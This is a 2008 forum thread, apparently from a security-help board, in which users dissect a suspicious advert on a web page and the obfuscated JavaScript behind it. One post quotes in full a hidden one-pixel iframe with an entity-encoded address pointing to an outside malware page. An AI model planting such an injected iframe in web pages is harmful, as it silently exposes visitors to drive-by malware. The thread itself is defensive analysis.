site Search:


 
    All Forums Hot Topics Gallery






how-to block ads


 
Search Topic:
Share Topic
Posting?
Post a:
Post a:
Links: ·Hijack This logs? ·Panda Free Tools ·Vundo Removal
AuthorAll Replies


nwrickert
sand groper
Premium,MVM
join:2004-09-04
Geneva, IL
kudos:7
Reviews:
·AT&T U-Verse

reply to nwrickert

Re: Does anyone know anything about this advert?

Here is the iframe definition near the bottom of the eskimo.com page:
<iframe src="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#100;&#112;&#117;&#118;&#98;&#104;&#102;&#122;&#122;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#57;&#56;&#46;&#112;&#104;&#112;" width=1 height=1></iframe>
 
Anything obfuscated that way looks suspicious to me.

the content of the iframe has "unescape('%19%04%3C9%0E%60wL0" and that percent encoding goes on for most of the javascript (around 23000 bytes). Clearly somebody was hiding something.

I fetched those pages with "wget", so have local copies.

I later tried loading the page in XP with firefox, scripting turned on, but a limited user account. Nothing bad happened. This probably requires IE on an admin account before it can do anything bad.

Yet another reason to use a limited user account, to use firefox, to use the noscript extension.

--
AT&T dsl; Westell 327w modem/router; SuSE 10.1; firefox 2.0.0.13


EGeezer
Summertime
Premium
join:2002-08-04
Midwest
kudos:7

looks like the code in that line directs the user to the aforementiond website's directory: /dl/adv598.php
--
Mayors of New York come from nowhere and go nowhere.
Wallace Sayre (apparently, so do governors... )



nwrickert
sand groper
Premium,MVM
join:2004-09-04
Geneva, IL
kudos:7
Reviews:
·AT&T U-Verse

1 edit

yes it does

I used "lynx -dump" to decode it, before I posted the target link in an earlier post in this thread. That's quicker than trying to do it manually.

I don't currently have a good tool for handling that obfuscated javascript, though.



EGeezer
Summertime
Premium
join:2002-08-04
Midwest
kudos:7
Reviews:
·Callcentric

1 edit

I also see that the adv.php page seems to have a malware warning from stopbadware.org - is that a recent development?

This site is currently (as of 04/15/2008) being reported to StopBadware by the following partners:Google: reported bad

--
Mayors of New York come from nowhere and go nowhere.
Wallace Sayre (apparently, so do governors... )



nwrickert
sand groper
Premium,MVM
join:2004-09-04
Geneva, IL
kudos:7

Not sure.

I checked the stopbadware.org site for www.eskimo.com/dsl/ but it isn't listed. Other parts of eskimo.com are listed, but not the one that was used here.

I'm not seeing any warning if I try reloading the original link.



EGeezer
Summertime
Premium
join:2002-08-04
Midwest
kudos:7
Reviews:
·Callcentric

I think I might have loaded Google's link instead - Such a dummy I am!! My GET of the actual link only yielded an apache page .
--
Mayors of New York come from nowhere and go nowhere.
Wallace Sayre (apparently, so do governors... )



newview
Ex .. Ex .. Exactly
Premium
join:2001-10-01
Parsonsburg, MD
kudos:1
Reviews:
·Vonage
·DIRECTV

reply to nwrickert

said by nwrickert:

I don't currently have a good tool for handling that obfuscated javascript, though.

If you're looking for a good "de-obfuscator", Net Demon does the trick.
--

Ö¿Ö
The Rules of Spam | Maryland's Newest Anti-Spam Law
Where are we going? And what's with the hand basket?

Tuesday, 29-May 20:51:12 Terms of Use & Privacy | feedback | contact | Hosting by nac.net - DSL,Hosting & Co-lo
over 12.5 years online © 1999-2012 dslreports.com.
Most commented news this week
Hot Topics